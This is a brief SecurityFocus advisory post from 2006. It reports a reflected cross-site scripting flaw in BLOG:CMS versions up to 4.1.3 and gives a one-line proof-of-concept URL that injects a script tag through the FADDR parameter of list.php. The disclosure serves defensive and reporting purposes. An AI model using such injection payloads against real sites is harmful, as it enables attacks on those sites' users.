SecurityFocus

BLOG:CMS <= 4.1.3 XSS Nov 18 2006 02:40PM
katatafish hush com

Version: 4.1.3 and prior
-----------------------------

Proof of Concept
----------------
http://[host]/[path]/list.php?FADDR="><script>alert("XSS");</script>

katatafish (at) hush (dot) com

[ reply ]